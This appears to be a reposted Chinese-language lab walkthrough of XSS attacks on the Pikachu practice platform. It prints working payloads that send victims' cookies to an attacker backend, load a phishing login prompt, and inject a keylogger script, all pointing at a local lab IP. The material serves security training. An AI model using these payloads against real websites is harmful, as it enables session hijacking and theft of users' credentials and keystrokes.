pikachu練習平台(XSS-漏洞測試案例(cookie的竊取和利用、釣魚攻擊、XSS獲取鍵盤記錄))


XSS-漏洞測試案例

xss案例

1.cookie的竊取和利用

2.釣魚攻擊

3.XSS獲取鍵盤記錄

 

在進行案例之前首先要搭建xss后台

搭建xss后台

1.在pikachu文件夾下面,把pkxss單獨放在www下面;

 

 

 

 2.修改配置文件  數據庫服務器地址,賬號,密碼;

 

 

 

 3.登錄;

 

 

 

 4.安裝;

 

 

 

 5.修改,重定向到一個可信的網站(令點擊者不知情);

 

 

 

 

 

 

 

 

后台登陸成功;

 

 

 

 

 

一. get型xss cookie值獲取

首先修改字符輸入長度;

 

 

 

 

輸入框輸入

<script>document.location='http://192.168.17.111/pkxss/xcookie/cookie.php?cookie=' +document.cookie;</script>  點擊提交;就會跳轉到首頁面;

 

 

 

 

其中referer

 http://192.168.17.111/pikachu-master/pikachu-master/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F192.168.17.111%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2Bdocument.cookie%3B%3C%2Fscript%3E&submit=submit

用戶一旦訪問這個鏈接,它只會跳轉到首頁面,但是我們這樣就已經獲取到cookie值

 

 

 

 

 

 

 

Post型xss cookie值獲取

首先登陸;

 

 

 

查看pkxss-xcookie-post.html文件;

 

 

 

 用戶訪問欺騙的跳轉頁面,就會在pxss獲取到cookie值。

 

 

二. 釣魚演示(存儲型xss)

進入文件修改ip;

 

 

 

 

 

 

給出認證框,用戶輸入用戶名、密碼,重定向到后台

同樣的后台也有同樣的接口,get方式獲取到用戶名跟密碼然后存儲;

 

 

 

 

回到存儲型xss留言板  輸入

<img  src=" http://192.168.17.111/pkxss/xfish/fish.php"  />        img標簽

<script  src=" http://192.168.17.111/pkxss/xfish/fish.php">  </script>    script標簽

 

 

 

刷新之后還會有這個彈窗;

 

 

 

輸入用戶名  密碼  admin   root

返回pkxss后台界面,刷新就會有剛才的獲取到的信息。

 

 

三.XSS獲取鍵盤記錄

 

跨域http://  www . gxy.com :8080 / script/test.js

    協議   子域名  主域名   端口   資源地址

當協議、主機、端口的任意一個不相同時,稱不同域

將不同域之間的請求數據操作,稱跨域操

 

下面這些標簽可以跨域加載資源

<script src=”…”>//js,加載到本地執行

<img src=”…”>//圖片

<link href=”…”>//css

<iframe src=“…”>//任意資源

 

存入到數據庫中;

 

 

 

 

把js 文件放到被攻擊者的頁面當中,通過獲取鍵盤值,post發送給攻擊者后台;

 

 

 

存儲型xss  留言板  輸入

<script  src=" http://192.168.17.111/pkxss/xkeypress/rk.php">  </script> 

在鍵盤上隨便輸入發現顯示頁面請求失敗

在pkxss后台我們就可以看到獲取的信息。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM